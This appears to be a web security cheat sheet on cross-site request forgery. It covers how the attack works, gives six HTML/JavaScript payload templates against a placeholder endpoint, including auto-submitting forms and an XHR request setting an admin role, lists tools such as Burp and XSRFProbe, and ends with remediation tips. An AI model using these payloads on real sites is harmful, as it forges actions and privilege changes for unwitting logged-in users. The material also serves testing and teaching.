CSRF (Cross-Site Request Forgery)

How CSRF Works

Via a CSRF attack, the attacker can bypass the authentication process or perform actions with higher privileges. What to do to execute this attack:

1. Create the custom payload

2. Embed the request into a hyperlink

3. Trick the victim into clicking the link which will send your request to the website.

4. Forge the request to conduct malicious action

This attack only works if the victim is an authenticated user because when the request is made, the application will check if the cookies of a valid session are available. If the relevant cookies are available, those will need to be sent with the request. If the session is valid and the website approves the sent cookies, CSRF attack becomes successful.

This attack only works if the victim is an authenticated user because when the request is made, the application will check if the cookies of a valid session are available. If the relevant cookies are available, those will need to be sent with the request. If the session is valid and the website approves the sent cookies, the CSRF attack will be successful.

Payloads

Some payloads that can be used during CSRF attacks can be found below:

--------------------------------------------------------------------
HTML GET:
<a href=”http://vulnerable/endpoint?parameter=CSRFd">Click</a>
--------------------------------------------------------------------
HTML GET (no interaction):
<img src=”http://vulnerable/endpoint?parameter=CSRFd">
--------------------------------------------------------------------
HTML POST:
<form action="http://vulnerable/endpoint" method="POST">
<input name="parameter" type="hidden" value="CSRFd" />
<input type="submit" value="Submit Request" />
</form>
--------------------------------------------------------------------
HTML POST (no interaction):
<form id="autosubmit" action="http://vulnerable/endpoint" method="POST">
<input name="parameter" type="hidden" value="CSRFd" />
<input type="submit" value="Submit Request" />
</form>
<script>
document.getElementById("autosubmit").submit();
</script>
--------------------------------------------------------------------
JSON GET:
<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://vulnerable/endpoint");
xhr.send();
</script>
--------------------------------------------------------------------
JSON POST:
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://vulnerable/endpoint");
xhr.setRequestHeader("Content-Type", "text/plain");
xhr.send('{"role":admin}');
</script>
--------------------------------------------------------------------

Tools

• Burp has a Generate CSRF PoC tool that will help create payloads.

• XSRFProbe is an advanced Cross Site Request Forgery (CSRF/XSRF) Audit and Exploitation Toolkit. Equipped with a powerful crawling engine and numerous systematic checks, it is able to detect most cases of CSRF vulnerabilities, their related bypasses and further generate (maliciously) exploitable proof of concepts with each found vulnerability.

Remediation

The most popular prevention method is adding an Anti-CSRF Token which will be associated with a particular user to prevent CSRF attacks. Another known prevention method is adding Same-Site flag to Cookies which will check if the origin of the request sender is the same as the Cookie owner. The following suggestions can be listed as Suggestions for CSRF attacks.

• Use CSRF token in HTTP header and match its value on server side.

• Do not use GET HTTP method for critical operations such as Create/Update/Delete

• Implement “Same-site” Attribute to cookies.